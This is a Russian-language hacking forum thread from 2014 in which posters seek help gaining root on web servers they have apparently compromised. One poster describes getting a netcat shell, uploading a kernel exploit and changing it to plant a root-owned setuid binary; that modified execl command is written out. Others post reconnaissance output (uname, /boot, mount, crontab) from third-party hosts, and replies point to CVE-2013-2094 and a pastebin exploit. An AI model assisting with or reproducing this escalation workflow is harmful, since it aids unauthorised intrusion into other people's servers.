* For x86_64 kernel and ppc64 Compile as;

* gcc -w -m64 -o exploit exploit.c

забиндил порт на системе получил коммандную строку

приконнектился через неткат

залил сплоит как make.sh

запускаем ./make.sh

permission denied

пробую из темпа

./make.sh

permission denied

дальше меняю

Code:
execl("/bin/sh", "sh", NULL);

на это

Code:
execl("/bin/sh","/bin/sh", "-c", "cp ./suidnik ./s; chown root ./s; chgrp root ./s; chmod 777 ./s; chmod +s ./s;", NULL);

пробовал скомпилить как в инструкции к сплоиту

gcc -w -o exploit exploit.c

после компиляции пробую запустить сплоит опять пермишн денайд ((((

пробую так gcc make.sh

дальше ./a.out

опять пермишн денайд ((((

подскажите плиз что не так делаю? и как обойти permission denied?

всё компилилось без ошибок всё ок... спасибо огромное за помощь и потраченное время...

сильно не бить если нельзя запускать через sh сплоит, а надо обязательно компилить, честно презнаюсь первый раз с этим сталкиваюсь и возникает такая необходимость...

hahanovB

08.07.2014, 10:03

Прошу помощи весь гугл перерыл...

Code:
uname -a
FreeBSD cp65.agava.net 7.4-RELEASE-p3 FreeBSD 7.4-RELEASE-p3 #5: Wed Sep 28 22:16:19 UTC 2011 root@master-cpx.agava.net:/opt/usr/obj/opt/usr/src/sys/XEON i386

ls -la --full-time /lib/lib*
total 2580
drwxr-xr-x 7 root wheel 1024 Dec 6 2011 .
drwxr-xr-x 20 root wheel 512 Jul 1 19:30 ..
-r--r--r-- 1 root wheel 7689 May 26 2011 beastie.4th
-r--r--r-- 1 root wheel 8192 May 26 2011 boot
-r--r--r-- 1 root wheel 512 May 26 2011 boot0
-r--r--r-- 1 root wheel 512 May 26 2011 boot0sio
-r--r--r-- 1 root wheel 512 May 26 2011 boot1
-r--r--r-- 1 root wheel 7680 May 26 2011 boot2
-r--r--r-- 1 root wheel 1201 May 26 2011 cdboot
drwxr-xr-x 2 root wheel 512 May 26 2011 defaults
-r--r--r-- 1 root wheel 1746 Aug 23 2011 device.hints
drwxr-xr-x 2 root wheel 512 May 26 2011 firmware
-r--r--r-- 1 root wheel 2258 May 26 2011 frames.4th
-r--r--r-- 1 root wheel 7567 May 26 2011 gptboot
-r--r--r-- 1 root wheel 26279 May 26 2011 gptzfsboot
drwxr-xr-x 2 root wheel 512 Nov 6 2006 kernel
-r-xr-xr-x 1 root wheel 262144 May 26 2011 loader
-r--r--r-- 1 root wheel 5865 May 26 2011 loader.4th
-r--r--r-- 1 root wheel 15219 May 26 2011 loader.help
-r-xr-xr-x 1 root wheel 217088 Aug 3 2009 loader.old
-r--r--r-- 1 root wheel 389 Nov 6 2006 loader.rc
-r--r--r-- 1 root wheel 512 May 26 2011 mbr
drwxr-xr-x 2 root wheel 512 Nov 6 2006 modules
-r--r--r-- 1 root wheel 512 May 26 2011 pmbr
-r--r--r-- 1 root wheel 264192 May 26 2011 pxeboot
-r--r--r-- 1 root wheel 699 May 26 2011 screen.4th
-r--r--r-- 1 root wheel 35136 May 26 2011 support.4th
drwxr-xr-x 2 root wheel 512 May 26 2011 zfs
-r--r--r-- 1 root wheel 33280 May 26 2011 zfsboot
-r-xr-xr-x 1 root wheel 282624 May 26 2011 zfsloader

df -h
Filesystem Size Used Avail Capacity Mounted on
/dev/amrd0s1a 496M 151M 305M 33% /
devfs 1.0K 1.0K 0B 100% /dev
/dev/amrd0s1f 125G 89G 26G 78% /opt
/dev/amrd0s1e 989M 668M 242M 73% /usr
/dev/amrd0s1d 989M 634M 276M 70% /var
procfs 4.0K 4.0K 0B 100% /proc
procfs 4.0K 4.0K 0B 100% /opt/jails/cp/proc
devfs 1.0K 1.0K 0B 100% /opt/jails/cp/dev

cat /etc/crontab
# /etc/crontab - root's crontab for FreeBSD
#
# $FreeBSD: src/etc/crontab,v 1.32.24.1.4.1 2010/12/21 17:10:29 kensmith Exp $
#
SHELL=/bin/sh
PATH=/etc:/bin:/sbin:/usr/bin:/usr/sbin
#
#minute hour mday month wday who command
#
*/5 * * * * root /usr/libexec/atrun
#
# Save some entropy so that /dev/random can re-seed on boot.
*/11 * * * * operator /usr/libexec/save-entropy
#
# Rotate log files every hour, if necessary.
0 * * * * root newsyslog
#
# Perform daily/weekly/monthly maintenance.
1 3 * * * root periodic daily
15 4 * * 6 root periodic weekly
30 5 1 * * root periodic monthly
#
# Adjust the time zone if the CMOS clock keeps local time, as opposed to
# UTC time. See adjkerntz(8) for details.
1,31 0-5 * * * root adjkerntz -a

Надеюсь на вашу помощь

dumpersteam

16.08.2014, 15:22

Доброго всем дня, помогите найти как зарутать

$ uname -a

PHP:
Linux 3.2.0-49-generic#75-Ubuntu SMP Tue Jun 18 17:39:32 UTC 2013 x8 6_64 x86_64 x86_64 GNU/Linux

$ ls -la /boot

PHP:
total 115252

drwxr-xr-x 4 root root 3072 Apr 11 21:56.

drwxr-xr-x 23 root root 4096 Apr 11 21:55..

-rw-r--r--1 root root 792767 Jan 24 2013 abi-3.2.0-37-generic

-rw-r--r--1 root root 792830 Feb 27 2013 abi-3.2.0-39-generic

-rw-r--r--1 root root 795365 Jun 18 2013 abi-3.2.0-49-generic

-rw-r--r--1 root root 795365 Jul 26 2013 abi-3.2.0-52-generic

-rw-r--r--1 root root 795743 Feb 18 23:33 abi-3.2.0-60-generic

-rw-r--r--1 root root 140505 Jan 24 2013 config-3.2.0-37-generic

-rw-r--r--1 root root 140488 Feb 27 2013 config-3.2.0-39-generic

-rw-r--r--1 root root 140622 Jun 18 2013 config-3.2.0-49-generic

-rw-r--r--1 root root 140629 Jul 26 2013 config-3.2.0-52-generic

-rw-r--r--1 root root 140612 Feb 18 23:33 config-3.2.0-60-generic

drwxr-xr-x 3 root root 7168 Apr 11 21:56 grub

-rw-r--r--1 root root 14610377 Feb 18 2013 initrd.i mg-3.2.0-37-generic

-rw-r--r--1 root root 14591334 Mar 28 2013 initrd.i mg-3.2.0-39-generic

-rw-r--r--1 root root 14639798 Sep 3 2013 initrd. img-3.2.0-49-generic

-rw-r--r--1 root root 14639112 Apr 11 21:50 initrd.im g-3.2.0-52-generic

-rw-r--r--1 root root 14647977 Apr 11 21:56 initrd.im g-3.2.0-60-generic

drwx------2 root root 12288 Feb 18 2013 lost+ found

-rw-r--r--1 root root 176764 Nov 27 2011 memtes t86+.bin

-rw-r--r--1 root root 178944 Nov 27 2011 memtes t86+_multiboot.bin

-rw-------1 root root 2886103 Jan 24 2013 System. map-3.2.0-37-generic

-rw-------1 root root 2888361 Feb 27 2013 System. map-3.2.0-39-generic

-rw-------1 root root 2893287 Jun 18 2013 System. map-3.2.0-49-generic

-rw-------1 root root 2893555 Jul 26 2013 System. map-3.2.0-52-generic

-rw-------1 root root 2895229 Feb 18 23:33 System.m ap-3.2.0-60-generic

-rw-------1 root root 4969072 Jan 24 2013 vmlinuz-3.2.0-37-generic

-rw-------1 root root 4971472 Feb 27 2013 vmlinuz-3.2.0-39-generic

-rw-------1 root root 4978416 Jun 18 2013 vmlinuz-3.2.0-49-generic

-rw-------1 root root 4978224 Jul 26 2013 vmlinuz-3.2.0-52-generic

-rw-------1 root root 4981616 Feb 18 23:33 vmlinuz-3.2.0-60-generic

$ mount

PHP:
/dev/md3 on/type ext3(rw,errors=remount-ro)

proc on/proc type proc(rw,noexec,nosuid,nodev)

sysfs on/sys type sysfs(rw,noexec,nosuid,nodev)

none on/sys/fs/fuse/connections type fusectl(rw)

none on/sys/kernel/debug type debugfs(rw)

none on/sys/kernel/security type securityfs(rw)

udev on/dev type devtmpfs(rw,mode=0755)

devpts on/dev/pts type devpts(rw,noexec,nosuid,gid=5,mode=0620 )

tmpfs on/run type tmpfs(rw,noexec,nosuid,size=10%,mode=07 55)

none on/run/lock type tmpfs(rw,noexec,nosuid,nodev,size=5242 880)

none on/run/shm type tmpfs(rw,nosuid,nodev)

/dev/md2 on/tmp type ext3(rw)

/dev/md0 on/boot type ext3(rw)

vasykas

11.09.2014, 22:32

Code:
$ uname -a
Linux xxxxxxx.be 2.6.34.6-xxxx-grs-ipv6-64 #3 SMP Fri Sep 17 16:06:38 UTC 2010 x86_64 Intel(R) Xeon(R) CPU X3360 @ 2.83GHz GenuineIntel GNU/Linux Кто чем поможет? спасибо

YaBtr

12.09.2014, 09:25

vasykas said:
$ uname -a
Linux xxxxxxx 2.6.34.6-xxxx-grs-ipv6-64 #3 SMP Fri Sep 17 16:06:38 UTC 2010 x86_64 Intel(R) Xeon(R) CPU X3360 @ 2.83GHz GenuineIntel GNU/Linux
Кто чем поможет?
спасибо

Оформите пост согласно требованиям или выложите результат работы скрипта от b3

beginner2010

17.09.2014, 00:29

возможно ли поднять права? заранее спасибо

$ uname -a

Code:
FreeBSD *** 9.2-RELEASE FreeBSD 9.2-RELEASE #0: Wed Dec 11 16:09:05 CET 2013 ***:/usr/obj/usr/src/sys/XENHVM amd64

$ ls -la /boot

Code:
total 2832
drwxr-xr-x 8 root wheel 1024 Dec 11 2013 .
drwxr-xr-x 20 root wheel 8704 Sep 16 01:00 ..
-r--r--r-- 1 root wheel 12264 Sep 27 2013 beastie.4th
-r--r--r-- 1 root wheel 8192 Sep 27 2013 boot
-r--r--r-- 1 root wheel 512 Sep 27 2013 boot0
-r--r--r-- 1 root wheel 512 Sep 27 2013 boot0sio
-r--r--r-- 1 root wheel 512 Sep 27 2013 boot1
-r--r--r-- 1 root wheel 7680 Sep 27 2013 boot2
-r--r--r-- 1 root wheel 2940 Sep 27 2013 brand.4th
-r--r--r-- 1 root wheel 1185 Sep 27 2013 cdboot
-r--r--r-- 1 root wheel 5667 Sep 27 2013 check-password.4th
-r--r--r-- 1 root wheel 1872 Sep 27 2013 color.4th
drwxr-xr-x 2 root wheel 512 Sep 27 2013 defaults
-r--r--r-- 1 root wheel 3917 Sep 27 2013 delay.4th
-r--r--r-- 1 root wheel 791 Sep 27 2013 device.hints
drwxr-xr-x 2 root wheel 512 Sep 27 2013 firmware
-r--r--r-- 1 root wheel 2623 Sep 27 2013 frames.4th
-r--r--r-- 1 root wheel 15443 Sep 27 2013 gptboot
-r--r--r-- 1 root wheel 41923 Sep 27 2013 gptzfsboot
drwxr-xr-x 2 root wheel 33280 Dec 11 2013 kernel
drwxr-xr-x 2 root wheel 33280 Dec 11 2013 kernel.old
-r-xr-xr-x 1 root wheel 229376 Sep 27 2013 loader
-r--r--r-- 1 root wheel 5884 Sep 27 2013 loader.4th
-r--r--r-- 1 root wheel 14766 Sep 27 2013 loader.help
-r--r--r-- 1 root wheel 393 Sep 27 2013 loader.rc
-r--r--r-- 1 root wheel 512 Sep 27 2013 mbr
-r--r--r-- 1 root wheel 7000 Sep 27 2013 menu-commands.4th
-r--r--r-- 1 root wheel 30264 Sep 27 2013 menu.4th
-r--r--r-- 1 root wheel 4167 Sep 27 2013 menu.rc
-r--r--r-- 1 root wheel 18231 Sep 27 2013 menusets.4th
drwxr-xr-x 2 root wheel 512 Sep 27 2013 modules
-r--r--r-- 1 root wheel 512 Sep 27 2013 pmbr
-r--r--r-- 1 root wheel 231424 Sep 27 2013 pxeboot
-r--r--r-- 1 root wheel 700 Sep 27 2013 screen.4th
-r--r--r-- 1 root wheel 2618 Sep 27 2013 shortcuts.4th
-r--r--r-- 1 root wheel 35601 Sep 27 2013 support.4th
-r--r--r-- 1 root wheel 250284 Sep 27 2013 userboot.so
-r--r--r-- 1 root wheel 2883 Sep 27 2013 version.4th
drwxr-xr-x 2 root wheel 512 Sep 27 2013 zfs
-r--r--r-- 1 root wheel 66048 Sep 27 2013 zfsboot
-r-xr-xr-x 1 root wheel 266240 Sep 27 2013 zfsloader

$ mount

Code:
/dev/ada0s1a on / (ufs, local, journaled soft-updates)
devfs on /dev (devfs, local, multilabel)
/dev/ada0s1d on /expert (ufs, local, journaled soft-updates)

$ df -h

Code:
Filesystem Size Used Avail Capacity Mounted on
/dev/ada0s1a 24G 6.9G 15G 31% /
devfs 1.0k 1.0k 0B 100% /dev
/dev/ada0s1d 165G 107G 45G 70% /expert

$ cat /etc/crontab

Code:
# /etc/crontab - root's crontab for FreeBSD
#
# $FreeBSD: release/9.2.0/etc/crontab 194170 2009-06-14 06:37:19Z brian $
#
SHELL=/bin/sh
PATH=/etc:/bin:/sbin:/usr/bin:/usr/sbin
#
#minute hour mday month wday who command
#
*/5 * * * * root /usr/libexec/atrun
#
# Save some entropy so that /dev/random can re-seed on boot.
*/11 * * * * operator /usr/libexec/save-entropy
#
# Rotate log files every hour, if necessary.
0 * * * * root newsyslog
#
# Perform daily/weekly/monthly maintenance.
1 3 * * * root periodic daily
15 4 * * 6 root periodic weekly
30 5 1 * * root periodic monthly
#
# Adjust the time zone if the CMOS clock keeps local time, as opposed to
# UTC time. See adjkerntz(8) for details.
1,31 0-5 * * * root adjkerntz -a

$ pwd

Code:
/etc

Unknown

17.09.2014, 02:21

Чем чреват доступ к php.ini. Можно ли с помощью него повысить права?

YaBtr

17.09.2014, 09:17

beginner2010

Пробуйте это, версия для суидника:

http://pastebin.com/mvrVAtJw

PoliGroS

11.10.2014, 15:24

$ uname -a

linux mail.xxxxxxx.xx 2.6.32-279.11.1.el6.x86_64 #1 SMP Tue Oct 16 11:16:02 CDT 2012 x86_64 x86_64 x86_64 GNU/Linux

$ mount

/dev/mapper/vg_noc-LogVol00 on / type ext4 (rw)

proc on /proc type proc (rw)

sysfs on /sys type sysfs (rw)

devpts on /dev/pts type devpts (rw,gid=5,mode=620)

tmpfs on /dev/shm type tmpfs (rw)

/dev/sda1 on /boot type ext4 (rw)

none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)

sunrpc on /var/lib/nfs/rpc_pipefs type rpc_pipefs (rw)

nfsd on /proc/fs/nfsd type nfsd (rw)

/etc/named on /var/named/chroot/etc/named type none (rw,bind)

/var/named on /var/named/chroot/var/named type none (rw,bind)

/etc/rndc.conf on /var/named/chroot/etc/rndc.conf type none (rw,bind)

/usr/lib64/bind on /var/named/chroot/usr/lib64/bind type none (rw,bind)

/etc/named.iscdlv.key on /var/named/chroot/etc/named.iscdlv.key type none (rw,bind)

/etc/named.root.key on /var/named/chroot/etc/named.root.key type none (rw,bind)

$ cat /proc/version

Linux version 2.6.32-279.11.1.el6.x86_64 (mockbuild@sl6.fnal.gov) (gcc version 4.4.6 20120305 (Red Hat 4.4.6-4) (GCC) ) #1 SMP Tue Oct 16 11:16:02 CDT 2012

$ ls -la /boot

total 61696

dr-xr-xr-x. 5 root root 4096 Oct 18 2012 .

dr-xr-xr-x. 24 root root 4096 May 15 10:14 ..

-rw-r--r-- 1 root root 170 Mar 7 2012 .vmlinuz-2.6.32-220.7.1.el6.x86_64.hmac

-rw-r--r-- 1 root root 171 Oct 16 2012 .vmlinuz-2.6.32-279.11.1.el6.x86_64.hmac

-rw-r--r-- 1 root root 170 Aug 15 2012 .vmlinuz-2.6.32-279.5.1.el6.x86_64.hmac

-rw-r--r-- 1 root root 2313972 Mar 7 2012 System.map-2.6.32-220.7.1.el6.x86_64

-rw-r--r-- 1 root root 2342243 Oct 16 2012 System.map-2.6.32-279.11.1.el6.x86_64

-rw-r--r-- 1 root root 2341894 Aug 15 2012 System.map-2.6.32-279.5.1.el6.x86_64

-rw-r--r-- 1 root root 100947 Mar 7 2012 config-2.6.32-220.7.1.el6.x86_64

-rw-r--r-- 1 root root 101977 Oct 16 2012 config-2.6.32-279.11.1.el6.x86_64

-rw-r--r-- 1 root root 101976 Aug 15 2012 config-2.6.32-279.5.1.el6.x86_64

drwxr-xr-x. 3 root root 4096 Nov 11 2011 efi

drwxr-xr-x. 2 root root 4096 Oct 18 2012 grub

-rw-r--r-- 1 root root 13966167 Mar 12 2012 initramfs-2.6.32-220.7.1.el6.x86_64.img

-rw-r--r-- 1 root root 15189592 Oct 18 2012 initramfs-2.6.32-279.11.1.el6.x86_64.img

-rw-r--r-- 1 root root 14207596 Sep 14 2012 initramfs-2.6.32-279.5.1.el6.x86_64.img

drwx------. 2 root root 16384 Nov 11 2011 lost+found

-rw-r--r-- 1 root root 171216 Mar 7 2012 symvers-2.6.32-220.7.1.el6.x86_64.gz

-rw-r--r-- 1 root root 179202 Oct 16 2012 symvers-2.6.32-279.11.1.el6.x86_64.gz

-rw-r--r-- 1 root root 179204 Aug 15 2012 symvers-2.6.32-279.5.1.el6.x86_64.gz

-rwxr-xr-x 1 root root 3941456 Mar 7 2012 vmlinuz-2.6.32-220.7.1.el6.x86_64

-rwxr-xr-x 1 root root 3988240 Oct 16 2012 vmlinuz-2.6.32-279.11.1.el6.x86_64

-rwxr-xr-x 1 root root 3987376 Aug 15 2012 vmlinuz-2.6.32-279.5.1.el6.x86_64

$ df -h

Filesystem Size Used Avail Use% Mounted on

/dev/mapper/vg_noc-LogVol00

729G 647G 45G 94% /

tmpfs 2.9G 0 2.9G 0% /dev/shm

/dev/sda1 1012M 95M 866M 10% /boot

$ cat /etc/crontab

SHELL=/bin/bash

PATH=/sbin:/bin:/usr/sbin:/usr/bin

MAILTO=root

HOME=/

$ cat /proc/sys/vm/mmap_min_addr

4096

$ pwd

/var/www/data/xxxxxx.ru/tmp/

$ ls -la /usr/bin/staprun

---s--x--- 1 root stapusr 158488 Jun 20 2012 /usr/bin/staprun

YaBtr

13.10.2014, 12:59

PoliGroS said:
$ uname -a
linux mail.xxxxxxx.xx 2.6.32-279.11.1.el6.x86_64 #1 SMP Tue Oct 16 11:16:02 CDT 2012 x86_64 x86_64 x86_64 GNU/Linux

CVE-2013-2094

PoliGroS

16.10.2014, 03:15

YaBtr said:
CVE-2013-2094

not work/ no root

OxoTnik

03.11.2014, 18:57

Code:

$ uname -a
Linux hinks.ru 2.6.32-279.19.1.el6.x86_64 #1 SMP Wed Dec 19 07:05:20 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
$ ls -la /boot
total 19936
dr-xr-xr-x 5 root root 1024 Jan 17 2013 .
drwxr-xr-x 26 root root 4096 Aug 3 16:39 ..
-rw-r--r-- 1 root root 171 Dec 19 2012 .vmlinuz-2.6.32-279.19.1.el6.x86_64.hmac
-rw-r--r-- 1 root root 2341554 Dec 19 2012 System.map-2.6.32-279.19.1.el6.x86_64
lrwxrwxrwx 1 root root 1 Jan 17 2013 boot -> .
-rw-r--r-- 1 root root 101977 Dec 19 2012 config-2.6.32-279.19.1.el6.x86_64
drwxr-xr-x 3 root root 1024 Jul 11 2011 efi
drwxr-xr-x 2 root root 1024 Jan 17 2013 grub
-rw-r--r-- 1 root root 13742636 Jan 17 2013 initramfs-2.6.32-279.19.1.el6.x86_64.img
drwx------ 2 root root 12288 Jul 11 2011 lost+found
-rw-r--r-- 1 root root 179242 Dec 19 2012 symvers-2.6.32-279.19.1.el6.x86_64.gz
-rwxr-xr-x 1 root root 3941776 Dec 19 2012 vmlinuz-2.6.32-279.19.1.el6.x86_64
$ ls -la --full-time /lib/lib*

$ mount
/dev/mapper/vg-root on / type ext4 (rw)
proc on /proc type proc (rw)
none on /dev/pts type devpts (rw,gid=5,mode=620)
/dev/md0 on /boot type ext2 (rw)
/dev/mapper/vg-mysql on /var/lib/mysql type ext4 (rw)
/dev/mapper/vg-log on /var/log type ext4 (rw)
/dev/mapper/vg-www on /www type ext4 (rw)
/dev/sdc on /mnt/flash type xfs (rw)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
$ df -h
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/vg-root 10G 2.3G 7.3G 24% /
/dev/md0 496M 23M 449M 5% /boot
/dev/mapper/vg-mysql 50G 1.1G 47G 3% /var/lib/mysql
/dev/mapper/vg-log 50G 2.7G 45G 6% /var/log
/dev/mapper/vg-www 50G 13G 35G 27% /www
/dev/sdc 15G 33M 15G 1% /mnt/flash
$ cat /etc/issue
CentOS release 6.3 (Final)
Kernel \r on an \m

$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed

$ cat /proc/version
Linux version 2.6.32-279.19.1.el6.x86_64 (mockbuild@c6b8.bsys.dev.centos.org) (gcc version 4.4.6 20120305 (Red Hat 4.4.6-4) (GCC) ) #1 SMP Wed Dec 19 07:05:20 UTC 2012
$ cat /proc/sys/vm/mmap_min_addr
4096
$ pwd
/www/user1/video.com/img_lib/ufo/science
$ ls -la /usr/bin/staprun

YaBtr

05.11.2014, 09:33

OxoTnik said:

Code:

$ uname -a
Linux hinks.ru 2.6.32-279.19.1.el6.x86_64 #1 SMP Wed Dec 19 07:05:20 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
$ ls -la /boot
total 19936
dr-xr-xr-x 5 root root 1024 Jan 17 2013 .
drwxr-xr-x 26 root root 4096 Aug 3 16:39 ..
-rw-r--r-- 1 root root 171 Dec 19 2012 .vmlinuz-2.6.32-279.19.1.el6.x86_64.hmac
-rw-r--r-- 1 root root 2341554 Dec 19 2012 System.map-2.6.32-279.19.1.el6.x86_64
lrwxrwxrwx 1 root root 1 Jan 17 2013 boot -> .
-rw-r--r-- 1 root root 101977 Dec 19 2012 config-2.6.32-279.19.1.el6.x86_64
drwxr-xr-x 3 root root 1024 Jul 11 2011 efi
drwxr-xr-x 2 root root 1024 Jan 17 2013 grub
-rw-r--r-- 1 root root 13742636 Jan 17 2013 initramfs-2.6.32-279.19.1.el6.x86_64.img
drwx------ 2 root root 12288 Jul 11 2011 lost+found
-rw-r--r-- 1 root root 179242 Dec 19 2012 symvers-2.6.32-279.19.1.el6.x86_64.gz
-rwxr-xr-x 1 root root 3941776 Dec 19 2012 vmlinuz-2.6.32-279.19.1.el6.x86_64
$ ls -la --full-time /lib/lib*

$ mount
/dev/mapper/vg-root on / type ext4 (rw)
proc on /proc type proc (rw)
none on /dev/pts type devpts (rw,gid=5,mode=620)
/dev/md0 on /boot type ext2 (rw)
/dev/mapper/vg-mysql on /var/lib/mysql type ext4 (rw)
/dev/mapper/vg-log on /var/log type ext4 (rw)
/dev/mapper/vg-www on /www type ext4 (rw)
/dev/sdc on /mnt/flash type xfs (rw)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
$ df -h
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/vg-root 10G 2.3G 7.3G 24% /
/dev/md0 496M 23M 449M 5% /boot
/dev/mapper/vg-mysql 50G 1.1G 47G 3% /var/lib/mysql
/dev/mapper/vg-log 50G 2.7G 45G 6% /var/log
/dev/mapper/vg-www 50G 13G 35G 27% /www
/dev/sdc 15G 33M 15G 1% /mnt/flash
$ cat /etc/issue
CentOS release 6.3 (Final)
Kernel \r on an \m

$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed

$ cat /proc/version
Linux version 2.6.32-279.19.1.el6.x86_64 (mockbuild@c6b8.bsys.dev.centos.org) (gcc version 4.4.6 20120305 (Red Hat 4.4.6-4) (GCC) ) #1 SMP Wed Dec 19 07:05:20 UTC 2012
$ cat /proc/sys/vm/mmap_min_addr
4096
$ pwd
/www/user1/video.com/img_lib/ufo/science
$ ls -la /usr/bin/staprun

Сплойт, что на пост выше, пробовал?

up

Посмотрел пост на соседнем форуме. Либы обновлены, с правами все в порядке. Эскалацию провести вряд ли плучится.

OxoTnik

05.11.2014, 09:55

YaBtr said:
Сплойт, что на пост выше, пробовал?

Да, безрезультатно

N@b$ter

10.11.2014, 12:14

Code:
uname -a
Linux xxxx.xxxx.xx 2.6.35.14-106.fc14.i686.PAE #1 SMP Wed Nov 23 13:39:51 UTC 2011 i686 i686 i386 GNU/Linux

ls -la /boot
dr-xr-xr-x. 5 root root 4096 Jan 17 2013 .
dr-xr-xr-x. 26 root root 4096 Sep 25 10:30 ..
-rw-r--r--. 1 root root 1713144 Nov 23 2011 System.map-2.6.35.14-106.fc14.i686.PAE
-rw-r--r--. 1 root root 115294 Nov 23 2011 config-2.6.35.14-106.fc14.i686.PAE
drwxr-xr-x. 3 root root 4096 Jan 17 2013 efi
drwxr-xr-x. 2 root root 4096 Jan 17 2013 grub
-rw-r--r--. 1 root root 12905836 Jan 17 2013 initramfs-2.6.35.14-106.fc14.i686.PAE.img
drwx------. 2 root root 16384 Jan 17 2013 lost+found
-rwxr-xr-x. 1 root root 3770976 Nov 23 2011 vmlinuz-2.6.35.14-106.fc14.i686.PAE

ls -la --full-time /lib/lib*
-rwxr-xr-x. 1 root root 7220 2011-08-05 14:40:46.000000000 +0300 /lib/libBrokenLocale-2.13.so
lrwxrwxrwx. 1 root root 23 2013-01-17 03:54:42.300000056 +0300 /lib/libBrokenLocale.so.1 -> libBrokenLocale-2.13.so
-rwxr-xr-x. 1 root root 16276 2011-08-05 14:40:47.000000000 +0300 /lib/libSegFault.so
lrwxrwxrwx. 1 root root 15 2013-01-17 03:54:58.275000055 +0300 /lib/libacl.so.1 -> libacl.so.1.1.0
-rwxr-xr-x. 1 root root 32244 2011-07-08 14:33:21.000000000 +0300 /lib/libacl.so.1.1.0
lrwxrwxrwx. 1 root root 20 2013-01-17 03:56:41.365000055 +0300 /lib/libaio.so.1 -> /lib/libaio.so.1.0.1
-rwxr-xr-x. 1 root root 2772 2010-01-19 19:39:05.000000000 +0200 /lib/libaio.so.1.0.0
-rwxr-xr-x. 1 root root 2772 2010-01-19 19:39:05.000000000 +0200 /lib/libaio.so.1.0.1
-rwxr-xr-x. 1 root root 13412 2011-08-05 14:40:45.000000000 +0300 /lib/libanl-2.13.so
lrwxrwxrwx. 1 root root 14 2013-01-17 03:54:42.303000056 +0300 /lib/libanl.so.1 -> libanl-2.13.so
lrwxrwxrwx. 1 root root 18 2013-01-17 03:56:01.560000059 +0300 /lib/libasound.so.2 -> libasound.so.2.0.0
-rwxr-xr-x. 1 root root 1002328 2011-01-28 12:11:13.000000000 +0200 /lib/libasound.so.2.0.0
lrwxrwxrwx. 1 root root 16 2013-01-17 03:54:58.150000057 +0300 /lib/libattr.so.1 -> libattr.so.1.1.0
-rwxr-xr-x. 1 root root 18756 2011-01-05 20:52:22.000000000 +0200 /lib/libattr.so.1.1.0
lrwxrwxrwx. 1 root root 17 2013-01-17 03:54:49.309000053 +0300 /lib/libaudit.so.1 -> libaudit.so.1.0.0
-rwxr-xr-x. 1 root root 93256 2011-08-15 21:41:30.000000000 +0300 /lib/libaudit.so.1.0.0
lrwxrwxrwx. 1 root root 19 2013-01-17 03:54:49.316000059 +0300 /lib/libauparse.so.0 -> libauparse.so.0.0.0
-rwxr-xr-x. 1 root root 60572 2011-08-15 21:41:30.000000000 +0300 /lib/libauparse.so.0.0.0
lrwxrwxrwx. 1 root root 17 2013-01-17 03:54:54.774000056 +0300 /lib/libblkid.so.1 -> libblkid.so.1.1.0
-rwxr-xr-x. 1 root root 141976 2011-01-27 21:46:46.000000000 +0200 /lib/libblkid.so.1.1.0
lrwxrwxrwx. 1 root root 15 2013-01-17 03:54:47.224000424 +0300 /lib/libbz2.so.1 -> libbz2.so.1.0.6
-rwxr-xr-x. 1 root root 71980 2010-09-30 08:09:37.000000000 +0300 /lib/libbz2.so.1.0.6
-rwxr-xr-x. 1 root root 1847224 2011-08-05 14:40:47.000000000 +0300 /lib/libc-2.13.so
lrwxrwxrwx. 1 root root 12 2013-01-17 03:54:42.441000056 +0300 /lib/libc.so.6 -> libc-2.13.so
lrwxrwxrwx. 1 root root 18 2013-01-17 03:54:58.951000061 +0300 /lib/libcap-ng.so.0 -> libcap-ng.so.0.0.0
-rwxr-xr-x. 1 root root 19468 2010-11-03 20:10:27.000000000 +0200 /lib/libcap-ng.so.0.0.0
lrwxrwxrwx. 1 root root 14 2013-01-17 03:54:58.211000051 +0300 /lib/libcap.so.2 -> libcap.so.2.22
-rwxr-xr-x. 1 root root 14396 2011-07-27 16:22:48.000000000 +0300 /lib/libcap.so.2.22
lrwxrwxrwx. 1 root root 19 2013-01-17 04:01:30.139000056 +0300 /lib/libcgroup.so.1 -> libcgroup.so.1.0.36
-rwxr-xr-x. 1 root root 66016 2011-05-26 17:02:35.000000000 +0300 /lib/libcgroup.so.1.0.36
-rwxr-xr-x. 1 root root 207384 2011-08-05 14:40:45.000000000 +0300 /lib/libcidn-2.13.so
lrwxrwxrwx. 1 root root 15 2013-01-17 03:54:42.454000056 +0300 /lib/libcidn.so.1 -> libcidn-2.13.so
lrwxrwxrwx. 1 root root 17 2013-01-17 03:54:46.902000059 +0300 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rwxr-xr-x. 1 root root 12032 2010-12-08 00:47:21.000000000 +0200 /lib/libcom_err.so.2.1
-rwxr-xr-x. 1 root root 36132 2011-08-05 14:40:48.000000000 +0300 /lib/libcrypt-2.13.so
lrwxrwxrwx. 1 root root 16 2013-01-17 03:54:42.457000056 +0300 /lib/libcrypt.so.1 -> libcrypt-2.13.so
-rwxr-xr-x. 1 root root 1609004 2011-09-07 22:02:30.000000000 +0300 /lib/libcrypto.so.1.0.0e
lrwxrwxrwx. 1 root root 19 2013-01-17 03:55:54.206000056 +0300 /lib/libcrypto.so.10 -> libcrypto.so.1.0.0e
lrwxrwxrwx. 1 root root 22 2013-01-17 04:01:17.627999954 +0300 /lib/libcryptsetup.so.1 -> libcryptsetup.so.1.0.0
